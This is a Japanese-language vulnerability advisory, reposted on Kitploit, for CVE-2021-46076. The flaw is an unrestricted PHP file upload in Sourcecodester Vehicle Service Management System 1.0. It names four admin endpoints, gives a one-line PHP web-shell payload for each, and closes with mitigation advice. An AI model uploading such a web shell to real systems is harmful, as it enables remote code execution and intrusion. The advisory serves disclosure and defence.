CVE-2021-46076 — CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 にはファイルアップロードの脆弱性があります。攻撃者は複数のエンドポイントで悪意のある php ファイルをアップロードでき、コード実行につながります。 | Kitploit
sanupl/cve-2021-46076CVE-2021-46076
CVE-2021-46076 - Sourcecodester Vehicle Service Management System 1.0 にはファイルアップロードの脆弱性があります。攻撃者は複数のエンドポイントで悪意のある php ファイルをアップロードでき、コード実行につながります。
114ヶ月前
コミュニティで最も使われているツールを見つけましょう。
CVE-2021-46076
エクスプロイトタイトル: Vehicle Service Management System - 'Multiple' ファイルアップロードがコード実行を引き起こす
CVE: CVE-2021-46076
CVSS: 8.8 HIGH
参考:
説明:
Sourcecodester Vehicle Service Management System 1.0 はファイルアップロードに対して脆弱です。攻撃者は複数のエンドポイントで悪意のある PHP ファイルをアップロードでき、コード実行につながります。
1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)
エクスプロイト:
ペイロード:
<?php system($_GET['cmd']);?>
2. Vehicle Service Management System - 'User List' (/admin/?page=user/manage_user)
エクスプロイト:
ペイロード:
<?php system($_GET['cmd']);?>
3. Vehicle Service Management System - 'Settings-System Logo' (/admin/?page=system_info)
エクスプロイト:
ペイロード:
<?php system($_GET['cmd']);?>
4. Vehicle Service Management System - 'Settings-Website Cover' (/admin/?page=system_info)
エクスプロイト:
ペイロード:
<?php system($_GET['cmd']);?>
影響:
攻撃者は複数のエンドポイントで悪意のある PHP ファイルをアップロードでき、コード実行につながります。
対策:
- ホワイトリストフィルターなしにファイル名と拡張子を直接受け入れないこと。
- Unicode 文字が必要ない場合は、ファイル名と拡張子の入力として英数字とドット 1 つのみを受け入れることを強く推奨します。
- サービス拒否攻撃を防ぐために、ファイルサイズを最大値に制限すること。
- アップロードディレクトリには「実行」権限を付与しないこと。
- クライアントサイドの検証のみに依存しないこと。